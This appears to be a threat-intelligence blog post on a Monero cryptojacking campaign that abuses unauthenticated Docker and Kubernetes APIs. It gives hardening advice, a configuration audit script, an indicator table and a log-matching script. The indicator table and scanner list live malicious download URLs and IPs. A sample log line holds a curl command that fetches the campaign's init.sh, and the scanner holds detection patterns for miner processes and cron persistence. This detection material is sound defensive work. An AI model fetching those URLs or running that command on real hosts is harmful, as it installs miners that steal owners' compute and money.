Cryptojacking Campaign Targets Docker and Kubernetes: Surge in Container-Based Attacks
A recent surge in cryptojacking campaigns has targeted unsecured Docker and Kubernetes environments, exploiting misconfigurations to gain unauthorized access. These attacks abuse Docker API endpoints that are exposed without authentication, allowing threat actors to deploy malicious containers built for cryptocurrency mining, specifically Monero. The campaign primarily targets high-performance cloud infrastructures, draining system resources and causing significant operational slowdowns for affected organizations.
The attacks underscore the growing trend of resource hijacking in cloud environments, where attackers exploit common deployment misconfigurations. As the campaign evolved, the malware demonstrated advanced lateral movement capabilities, enabling it to infect multiple containers across networks, prolonging the attack and maximizing cryptocurrency mining gains before detection.
Key Attack Techniques
The campaign capitalized on exposed Docker API endpoints lacking proper authentication, allowing attackers to remotely execute commands and deploy cryptocurrency-mining containers. Once inside, the attackers utilized sophisticated lateral movement techniques to infect other containers within the same environment, maximizing their control and mining capabilities.
Organizations in sectors such as finance, healthcare, and technology, which rely on container-based cloud infrastructures, are at significant risk. These cryptojacking operations can severely impact service performance, drive up costs, and cause major business disruptions.
Defensive Strategies
To mitigate the risk of cryptojacking, organizations should:
- Secure Docker and Kubernetes APIs: Require authentication on the Docker daemon and the Kubernetes API server, and keep these endpoints off publicly reachable interfaces.
- Monitor Container Activity: Set up robust monitoring mechanisms to detect unusual container activities that might signal a cryptojacking operation.
- Limit Resource Usage: Apply resource constraints to containers, minimizing the potential damage from any unauthorized activity.
- Patch Management: Regularly update container environments to avoid known vulnerabilities.
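The first and third points above can be checked mechanically. The following audit script is an added example (not code from the original post or from SOCRadar): it inspects a Docker daemon configuration shaped like /etc/docker/daemon.json for an API listener reachable over TCP without TLS client verification, and inspects the HostConfig section that `docker inspect` returns for containers running without memory, CPU or PID limits. The configuration values, container names and the 10.0.0.5 bind address are constructed for the example.

```python
"""Audit a Docker host for the two misconfigurations the campaign above relies on:
an API listener accepting unauthenticated clients, and containers without resource
limits.  Inputs are plain dicts; all sample values below are constructed."""
from urllib.parse import urlparse


def audit_daemon_config(daemon: dict) -> list:
    """Return findings for a daemon.json-style dict (keys: hosts, tlsverify, tlscacert)."""
    findings = []
    hosts = daemon.get("hosts", ["unix:///var/run/docker.sock"])
    tls_verify = bool(daemon.get("tlsverify", False))
    for host in hosts:
        parsed = urlparse(host)
        if parsed.scheme != "tcp":
            continue  # unix:// and fd:// listeners are local to the host
        bind = parsed.hostname or ""
        if not tls_verify:
            findings.append(f"CRITICAL: API on {host} accepts unauthenticated clients (tlsverify is off)")
        if bind in ("", "0.0.0.0", "::"):
            findings.append(f"WARNING: API on {host} is bound to all interfaces; restrict the bind address or firewall the port")
    # tlsverify is meaningless without a CA to validate client certificates against
    if tls_verify and not daemon.get("tlscacert"):
        findings.append("CRITICAL: tlsverify is set but tlscacert is missing; client certificates cannot be validated")
    return findings


def audit_host_config(name: str, host_config: dict) -> list:
    """Return findings for one container's HostConfig (as printed by `docker inspect`)."""
    findings = []
    if host_config.get("Memory", 0) <= 0:
        findings.append(f"WARNING: {name}: no memory limit (Memory=0); a miner can consume all host RAM")
    if host_config.get("NanoCpus", 0) <= 0 and host_config.get("CpuQuota", 0) <= 0:
        findings.append(f"WARNING: {name}: no CPU limit (NanoCpus and CpuQuota are 0); a miner can take every core")
    if host_config.get("PidsLimit") in (None, 0, -1):
        findings.append(f"WARNING: {name}: no PID limit; fork bombs and worker swarms are unconstrained")
    if host_config.get("Privileged"):
        findings.append(f"CRITICAL: {name}: runs privileged; a compromised container can reach the host")
    return findings


# Constructed samples: the weak setting beside the corrected one.
WEAK_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],  # 10.0.0.5: constructed management address
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}
WEAK_CONTAINER = {"Memory": 0, "NanoCpus": 0, "CpuQuota": 0, "PidsLimit": None, "Privileged": False}
LIMITED_CONTAINER = {"Memory": 512 * 1024 * 1024, "NanoCpus": 1_000_000_000, "CpuQuota": 0,
                     "PidsLimit": 256, "Privileged": False}

if __name__ == "__main__":
    for label, cfg in (("weak daemon", WEAK_DAEMON), ("hardened daemon", HARDENED_DAEMON)):
        print(label, audit_daemon_config(cfg) or ["OK"])
    for label, hc in (("weak container", WEAK_CONTAINER), ("limited container", LIMITED_CONTAINER)):
        print(label, audit_host_config(label, hc) or ["OK"])
```

Both functions return an empty list for the hardened inputs, so the script drops straight into a CI job or a periodic host check that fails on any finding. Note the third case the daemon audit covers: `tlsverify` set without `tlscacert` looks secure in a casual review but cannot reject a client presenting an arbitrary certificate.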
Indicators of Compromise (IOC) and Techniques (TTP)
| Category | Details |
|---|---|
| IP Addresses | 45.9.148.35, 164.68.106.96, 192.155.94.199, 147.75.47.199 |
| Hashes | 82874f856a71a751f0bdb1ce7a3b7bb6, e10e3934d7659e00cc7f47b569af9ff5, 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a |
| URLs | http://45.9.148.35/aws, http://solscan.live/sh/init.sh, https://solscan.live/bin/xmrig |
| TTP (MITRE ATT&CK) | T1222.002: Linux and Mac File and Directory Permissions Modification, T1053.003: Cron, T1021.004: SSH |
| Killchain Stage | Initial Exploitation, Privilege Escalation, Execution, Lateral Movement |
| Malicious Scripts | Example: http://solscan.live/sh/xmr.sh.sh, http://solscan.live/sh/setup_xmr.sh, http://solscan.live/incoming/docker.php?dockerT= |
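To turn the table above into something a SOC can run, the following script is an added example (not code from the original post or from SOCRadar) that matches the listed IP addresses, hashes and URLs against log lines. It goes slightly beyond the table in two ways, both labelled in the code: it derives the hostname solscan.live from the listed URLs so that DNS and proxy logs can be matched even when the path differs, and it adds two behavioural checks tied to the table's TTPs (the xmrig binary name and cron persistence, T1053.003). The log lines are constructed for the example; the indicators are the ones on the page.

```python
"""Match the campaign's published indicators against log lines.
IOC values are from the table above; every log line below is constructed."""
import re
from urllib.parse import urlparse

IOC_IPS = {"45.9.148.35", "164.68.106.96", "192.155.94.199", "147.75.47.199"}
IOC_HASHES = {
    "82874f856a71a751f0bdb1ce7a3b7bb6",
    "e10e3934d7659e00cc7f47b569af9ff5",
    "505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a",
}
IOC_URLS = {
    "http://45.9.148.35/aws",
    "http://solscan.live/sh/init.sh",
    "https://solscan.live/bin/xmrig",
    "http://solscan.live/sh/xmr.sh.sh",
    "http://solscan.live/sh/setup_xmr.sh",
    "http://solscan.live/incoming/docker.php",  # listed with a trailing ?dockerT= query
}
# Derived indicator (an assumption beyond the table): the hostname behind the listed URLs.
IOC_DOMAINS = {urlparse(u).hostname for u in IOC_URLS} - IOC_IPS

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{32}\b")  # SHA-256 first, then MD5
URL_RE = re.compile(r"https?://[^\s\"']+")


def scan_line(line: str) -> list:
    """Return (category, indicator) pairs found in one log line; [] when clean."""
    hits = []
    for ip in IPV4_RE.findall(line):
        if ip in IOC_IPS:
            hits.append(("ip", ip))
    for digest in HASH_RE.findall(line.lower()):
        if digest in IOC_HASHES:
            hits.append(("hash", digest))
    for url in URL_RE.findall(line):
        base = url.split("?", 1)[0]  # the query string (e.g. ?dockerT=...) varies per victim
        if base in IOC_URLS:
            hits.append(("url", base))
        elif urlparse(base).hostname in IOC_DOMAINS:
            hits.append(("domain", urlparse(base).hostname))
    # Behavioural checks tied to the table's TTPs (added, not part of the IOC list).
    if re.search(r"\bxmrig\b", line):
        hits.append(("process", "xmrig"))
    if re.search(r"\bcrontab\b|/etc/cron", line):
        hits.append(("persistence", "cron"))
    return hits


def scan_logs(lines) -> dict:
    """Map line index -> hits for every line that matched at least one indicator."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


# Constructed sample lines in the shape of daemon, process and file-integrity logs.
SAMPLE_LOGS = [
    "2024-09-14T02:11:07Z dockerd remote=45.9.148.35 POST /containers/create image=alpine",
    "execve: curl -fsSL http://solscan.live/sh/init.sh",
    "fim: new file /tmp/.x/xmrig sha256=505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a",
    "dockerd remote=10.0.0.23 GET /containers/json",
    "proxy GET http://solscan.live/incoming/docker.php?dockerT=abc status=200",
]

if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS).items():
        print(idx, SAMPLE_LOGS[idx][:60], "->", hits)
```

The benign fourth line produces no hits, which is the property worth keeping an eye on as the indicator lists grow: the IP and hash matchers only fire on exact set membership, and the URL matcher strips the query string before comparing, so a callback with a different `dockerT=` value still matches the listed script path.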
This cryptojacking campaign continues to evolve, highlighting the vulnerabilities inherent in container environments. Organizations should prioritize securing cloud-based systems and monitoring for signs of resource hijacking.
In conclusion, this surge in cryptojacking attacks targeting Docker and Kubernetes environments highlights the urgent need for robust cloud security measures. To stay informed about evolving cyber threats, including campaigns similar to this cryptojacking incident, explore other active threats listed on the SOCRadar Campaigns page. Here, you’ll find detailed insights into current cyber campaigns, helping you safeguard your organization against emerging threats.